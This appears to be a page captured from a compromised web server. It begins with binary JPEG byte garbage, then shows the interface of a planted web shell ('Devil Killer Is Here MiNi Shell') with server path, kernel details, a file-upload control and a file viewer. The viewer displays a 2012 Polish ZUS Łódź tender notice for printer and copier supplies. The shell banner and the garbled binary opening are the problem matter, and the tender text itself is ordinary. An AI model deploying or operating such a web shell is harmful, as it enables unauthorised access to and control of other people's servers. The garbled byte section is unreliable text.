JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/283350-N-2012.html

<p class="kh_header"><b>Łódź: Dostawy materiałów eksploatacyjnych, wyrobów i części do urządzeń drukujących i fotokopiujących</b><br>
<b>Numer ogłoszenia: 283350 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> ZUS I Oddział w Łodzi , ul. Zamenhofa 2, 90-431 Łódź, woj. łódzkie, tel. 42 6382740, 42 638 29 65, faks 42 6382665.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy materiałów eksploatacyjnych, wyrobów i części do urządzeń drukujących i fotokopiujących.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.    Numer postępowania: 210000/370/15/2012/ADR/ZAP-16.
2.    Przedmiotem zamówienia są dostawy fabrycznie nowych materiałów eksploatacyjnych producenta urządzenia lub materiałów eksploatacyjnych  innych  firm o jakości odpowiadającej wyrobom producenta urządzenia oraz fabrycznie nowych wyrobów i części do urządzeń drukujących i fotokopiujących, zgodnie z przewidywanym zapotrzebowaniem ilościowym i asortymentowym podanym w Formularzu cenowym, stanowiącym Załącznik Nr 2 do Instrukcji dla Wykonawców.
Za nowy uznaje się wyrób do wytworzenia którego zastosowano wcześniej nieużywane części i komponenty 
(za fabrycznie nowy nie uznaje się wyrobu, w którym  pojemnik został jedynie wyczyszczony i ponownie napełniony, włączając w to plastikową obudowę).
3.	Wykonawca zobowiązany jest oferować przedmiot zamówienia spełniający wymagania opisane w Załączniku Nr 2 do Instrukcji dla Wykonawców, potwierdzając to stosownym oświadczeniem, którego wzór określono we Wniosku o dopuszczenie do udziału w licytacji elektronicznej (Załącznik Nr 1 do Instrukcji dla Wykonawców).
4.	Oferowany produkt winien być niezawodny w eksploatacji, a jakość wydruku oraz wydajność i szybkość schnięcia winna odpowiadać wyrobowi producenta urządzenia (tzn. powinna być taka sama lub lepsza), w tym  również w zakresie bezawaryjnej pracy urządzenia, w którym będzie zastosowany. W przypadku  oferowania nieodpowiedniego jakościowo produktu, Wykonawca, którego oferta zostanie wybrana w niniejszym postępowaniu, zobowiązany będzie do jego wymiany na produkt producenta urządzenia, na warunkach podanych we Wzorze umowy, stanowiącym część III Instrukcji. 
5.	Materiały eksploatacyjne, wyroby i części winny być wyprodukowane nie wcześniej niż 6 miesięcy przed terminem dostawy częściowej.
6.	Każdy dostarczany wyrób winien być w I gatunku, fabrycznie opakowany jednostkowo, odpowiednio do jednostek miary podanych w kol. 4 Załącznika Nr 2 do Instrukcji. Opakowanie, opatrzone logo producenta, winno być w stanie nienaruszonym. Przedmiotem oferty nie mogą być artykuły wycofane z produkcji. 
7.	Wyroby wymienione w Załączniku Nr 2 do Instrukcji, Wykonawca zobowiązany będzie dostarczać sukcesywnie, w ilościach i asortymencie wymienionym w częściowych zamówieniach przekazywanych przez Zamawiającego faksem lub drogą elektroniczną, przy czym zamówienie częściowe winno być realizowane jednorazowo. Zamawiający przewiduje, że dostawy realizowane będą co najmniej raz na miesiąc.
8.	Maksymalny czas realizacji dostawy zamówienia częściowego, o którym mowa w punkcie wyżej, nie może być dłuższy niż 7 dni roboczych od daty zgłoszenia. Za zgodą Zamawiającego, w szczególnie uzasadnionych przypadkach, termin ten może ulec wydłużeniu.
9.	Przedmiot zamówienia winien być dostarczany do magazynu  Zamawiającego mieszczącego się w Łodzi, przy
 ul. Zamenhofa 2.
10.	Wykonawca ponosi wszelkie koszty związane z realizacją zamówienia, w tym koszty transportu i rozładunku wyrobów w miejscu odbioru, wskazanym w pkt. 9.
11.	Przedmiotowe zamówienie o wartości 16.692,28 euro stanowi część zamówień tożsamych z przedmiotem niniejszego postępowania udzielanych w 2012 roku przez Zamawiającego. Łączna wartość zamówień tożsamych wynosi 20.340,74 euro.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.23.00-4, 30.19.21.13-6, 30.23.73.80-6, 30.12.43.00-7, 30.19.23.20-0, 30.23.44.00-2.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu w związku z art. 22 ust. 1 pkt 1-4 uPzp, metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu w związku z art. 22 ust. 1 pkt 1-4 uPzp, metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu w związku z art. 22 ust. 1 pkt 1-4 uPzp, metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu w związku z art. 22 ust. 1 pkt 1-4 uPzp, metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu w związku z art. 22 ust. 1 pkt 1-4 uPzp, metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku podpisywania wniosku o dopuszczenie do udziału w licytacji elektronicznej przez pełnomocnika, należy wraz z Wnioskiem złożyć  oryginał pełnomocnictwa albo kopię uwierzytelnioną notarialnie lub poświadczoną za zgodność z oryginałem przez osobę(-y) upoważnioną(-e) do reprezentowania Wykonawcy (tzn. zgodnie z formą reprezentacji określoną w odpowiednim rejestrze lub innym dokumencie właściwym dla formy organizacyjnej Wykonawcy). Nie jest dopuszczalne potwierdzanie za zgodność z oryginałem treści pełnomocnictwa przez samego pełnomocnika umocowanego tymże pełnomocnictwem, radcę prawnego i adwokata. Z treści pełnomocnictwa winno wynikać uprawnienie pełnomocnika do reprezentowania Wykonawcy. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. spółki cywilne, konsorcja ...), zgodnie z art. 23 ust. 2 uPzp, zobowiązani są ustanowić pełnomocnika. Z treści pełnomocnictwa winno wynikać prawo pełnomocnika  do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego w imieniu Wykonawcy. Dokument ten winien być podpisany przez osobę/osoby uprawnioną(-e) do jego udzielenia tj. zgodnie z formą reprezentacji każdego z Wykonawców. W przypadku wspólników spółki cywilnej dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i sposób reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Warunkiem dokonania zmiany umowy jest:
1)	zainicjowanie zmiany umowy przez Zamawiającego lub Wykonawcę,
2)	przedstawienie opisu proponowanej zmiany,
3)	uzasadnienie zmiany umowy,
4)	zaistnienie sytuacji określonej w IV.3) pkt 2 ogłoszenia.
2.	Aneks do umowy można sporządzić jedynie w zakresie zmiany terminu realizacji zamówień częściowych spowodowanej nagłymi większymi lub pilnymi potrzebami Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.zus.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Licytacja elektroniczna zostanie przeprowadzona na Platformie Licytacji Elektronicznej udostępnionej przez Urząd Zamówień Publicznych pod adresem: https://licytacje.uzp.gov.pl
2. Wymagania formalne:
2.1.  w licytacji elektronicznej mogą brać udział wyłącznie Wykonawcy zarejestrowani w systemie platformy licytacji elektronicznej pod adresem: https://licytacje.uzp.gov.pl
2.2.  aby Zamawiający miał możliwość dopuszczenia Wykonawcy do udziału w licytacji, Wykonawca musi zarejestrować się w systemie dostępnym na stronie: https://licytacje.uzp.gov.pl (jeżeli nie jest jeszcze zarejestrowanym użytkownikiem) i przekazać Zamawiającemu określony tam swój LOGIN, wypełniając odpowiednie pole we Wniosku o dopuszczenie do udziału w licytacji elektronicznej. LOGIN należy podać posługując się dokładnie takimi samymi znakami (w tym duże i małe litery, jeżeli takie zastosowano);
2.3.   w przypadku podania przez Wykonawcę niewłaściwego loginu lub nie przekazania go Zamawiającemu wraz 
z Wnioskiem, Wykonawca jest zobowiązany do jego przekazania najpóźniej jeden dzień przed terminem otwarcia licytacji. Nie dostarczenie loginu w sposób i w terminie określonym powyżej będzie traktowane jako odstąpienie Wykonawcy od dalszego postępowania.
3. Wymagania techniczne komputera Wykonawcy:
3.1. Wykonawca winien posiadać komputer PC z systemem operacyjnym Windows/Linux oraz przeglądarkę internetową Internet Explorer 6.0. lub wyższą lub Firefox 2.0  lub wyższą. Szczegółowe wymogi techniczne określone zostały w § 3 Regulaminu korzystania z Platformy na stronie internetowej UZP https://licytacje.uzp.gov.pl/page/rules oraz w Samouczku w pkt 7 na stronie internetowej UZP https://licytacje.uzp.gov.pl/page/selflearn Zamawiający nie ponosi odpowiedzialności za nieprawidłowości wynikające z korzystania przez Wykonawców z oprogramowania innego niż zalecane;
3.2. w interesie Wykonawcy komputer winien być stabilnie podłączony do sieci internetowej.</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1.	W toku licytacji elektronicznej uprzednio dopuszczeni i zaproszeni do udziału Wykonawcy składają kolejne postąpienia. Składanie postąpień będzie możliwe od otwarcia licytacji do jej zamknięcia.

2.	W toku licytacji Wykonawcy oferują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz w groszach. Grosze należy oddzielić od złotych kropką.

3.	Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej, co najmniej o kwotę minimalnego postąpienia.

4.	Cenę kolejnego korzystniejszego postąpienia należy wpisać po uprzednim zapoznaniu się z aktualnym najkorzystniejszym postąpieniem cenowym wpisując z rozwagą cenę przebicia oferty najkorzystniejszej tak aby omyłkowo nie wprowadzić niewłaściwej ceny. System jedynie dopytuje się o oferty, które złożone są w kwocie niższej o 50% od ceny oferty najkorzystniejszej. Inne oferty traktowane są jako wiążące i nie ma możliwości dokonywania korekty uprzednio omyłkowo wprowadzonej kwoty ponieważ jest ona przez system traktowana jako ostateczna i wiążąca po kliknięciu przycisku potwierdź.

5.	Zamawiający przyjął za minimalne postąpienie wartość 100.00 zł brutto.


6.	W toku licytacji elektronicznej Zamawiający automatycznie za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o złożonych przez nich cenach, z tym że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. Ww. informacje są na bieżąco dostępne po kliknięciu na zakładkę lista postąpień.
 
7.	Wykonawca po dokonaniu każdego postąpienia cenowego lub na bieżąco winien dokonywać odświeżania strony celem aktualizacji listy postąpień, tak aby posiadał aktualną listę postąpień z aktualnymi cenami.

8.	Zamawiający określa KWOTĘ WYWOŁAWCZĄ, którą Wykonawcy mogą licytować w dół: 82.528,45  zł.

9.	Aktualny czas w trakcie licytacji elektronicznej wyświetlany na Platformie Licytacji Elektronicznej jest decydujący dla oceny momentu dokonania poszczególnych czynności, w tym również dla oceny czy dane postąpienie zostało złożone przed zamknięciem licytacji. 

10.	Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto.

11.	Wykonawca najkorzystniejszego postąpienia elektronicznego na co najmniej 2 dni przed podpisaniem umowy zobowiązany jest do wypełnienia i przekazania Zamawiającemu Formularza cenowego (Załącznik nr 2 do Instrukcji dla Wykonawców) poprzez wpisanie do niego cen jednostkowych brutto dla poszczególnych pozycji oraz podsumowanie wartości brutto dla całego przedmiotu zamówienia. Wypełniony i podpisany Formularz cenowy będzie stanowił Załącznik do umowy. 

UWAGA: Cena brutto wynikająca z licytacji elektronicznej musi być bezwzględnie tożsama (identyczna)
 z faktyczną wartością brutto potwierdzoną pisemnie w Formularzu cenowym za realizację całego zamówienia określonego w ogłoszeniu i Instrukcji dla Wykonawców.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 60 min</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 21.08.2012 godzina 12:00, miejsce: ZUS I Oddział w Łodzi 
ul. Zamenhofa 2, 90-431 Łódź, Samodzielny Referat Zamówień Publicznych,
piętro XI, pok. 1114.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Termin otwarcia licytacji - 7 dni po terminie przekazania zaproszeń, o godz. 10:00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Termin zamknięcia licytacji - po 60 minutach od terminu otwarcia licytacji</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1.	Zamawiający będzie żądał od Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy (dalej zabezpieczenia) w wysokości 10 % ceny oferty brutto, które służyć będzie do pokrycia roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.
2.	Zabezpieczenie może być wniesione według wyboru Wykonawcy w jednej lub kilku z następujących form: 
w pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym 
że zobowiązanie spółdzielczej kasy oszczędnościowo-kredytowej jest zawsze zobowiązaniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, 
o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2007 r. Nr 42, poz. 275 z późn.zm.). 
3.	Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej, przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu terytorialnego, bądź przez ustanowienie zastawu rejestrowego na zasadach określonych w przepisach o zastawie rejestrowym i rejestrze zastawów.
4.	Zabezpieczenie wniesione w pieniądzu Wykonawca zobowiązany będzie wpłacić przelewem na rachunek bankowy Zamawiającego (nr 80 1020 5590 0000 0102 9170 7011). Zabezpieczenie wniesione w pieniądzu będzie przechowywane i zwracane na zasadach określonych w art. 148 ust. 5 uPzp. Wpłata zabezpieczenia należytego wykonania umowy następuje w dniu uznania rachunku Zamawiającego.
5.	W przypadku wnoszenia zabezpieczenia w formie niepieniężnej oryginał dokumentu winien być wystawiony na Zakład Ubezpieczeń Społecznych I Oddział w Łodzi.
6.	Dokument zabezpieczenia w formie niepieniężnej wystawiony za okres od dnia obowiązywania umowy do dnia 30.09.2013 r. powinien zawierać zapis o bezwarunkowej i nieodwołalnej zapłacie na pierwsze pisemne żądanie Zamawiającego, jeżeli żądanie to będzie stwierdzać, że Wykonawca nie wykonał lub nienależycie wykonał zobowiązania, wynikającego z umowy oraz nie zaspokoił roszczeń związanych z zapłatą kary umownej. Zaleca się, by Wykonawca przedstawił kopię lub projekt dokumentu potwierdzającego wniesienie zabezpieczenia
 w formie niepieniężnej najpóźniej na 2 dni przed wyznaczonym terminem podpisania umowy. 
7.	Zamawiający zwróci zabezpieczenie w terminie 30 dni od dnia realizacji ostatniej z dostaw częściowych i uznania przez Zamawiającego, że zamówienie zostało należycie wykonane. 
8.	W trakcie realizacji zamówienia Wykonawca może dokonać zmiany formy zabezpieczenia, na jedną lub kilka form wymienionych w pkt 2. Zmiana formy winna być dokonana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jego wysokości</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający wymaga, aby wykonanie przedmiotu zamówienia nastąpiło na warunkach i zasadach określonych 
we Wzorze umowy stanowiącym III część Instrukcji dla Wykonawców, która została umieszczona w ogłoszeniu, 
w zakładce Załączniki, wzory druków do licytacji elektronicznej na stronie www.zus.pl</p>
